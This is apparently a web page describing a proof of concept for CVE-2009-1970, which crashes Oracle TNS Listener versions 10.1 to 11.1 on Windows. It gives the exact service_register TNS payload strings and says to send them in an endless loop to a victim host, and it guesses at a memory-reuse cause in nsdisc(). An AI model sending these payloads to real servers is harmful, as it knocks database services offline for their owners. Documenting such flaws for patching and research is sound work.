CVE-2009-1970 PoC (CPUjul2009)
This PoC works with at least these Listeners:
11.1.0.6.0 win32
10.2.0.4 win32
10.1.0.5 win32
It makes Listener crashing and require relatively fast network.
On other side, server's heavy load may be very helpful environment for this.
Basically, all what it do, is just sending these two TNS commands to host, in eternal loop:
(CONNECT_DATA=(COMMAND=service_register)(SERVICE_ID=1CB5887660D7-11DD-9EBE-000C29E11606)(ADDRESS=(PROTOCOL=TCP)(HOST=some_host)(PORT=1098))(FLAGS=2))
and
(CONNECT_DATA=(COMMAND=service_register)(SERVICE_ID=1CB5887660D7-11DD-9EBE-000C29E11606)(ADDRESS=(PROTOCOL=TCP)(HOST=some_host)(PORT=1098))(FLAGS=2)(HANDOFF=OFF))
Probably, it is not a matter of service_register command parameters, but parameters set should be slightly different.
Use hostname or IP-address of victim host as argument in command-line and run.
If I'm correct (I may not) this problem is related to nsdisc() function in network layer. Listener closes connection using this function. It frees
some memory, but the same chunk of memory is used again for next connection.
Recent comments
1 week 1 day ago
14 weeks 5 days ago
14 weeks 5 days ago
24 weeks 2 days ago
25 weeks 6 days ago
25 weeks 6 days ago
26 weeks 1 day ago
27 weeks 44 min ago
27 weeks 1 day ago
27 weeks 1 day ago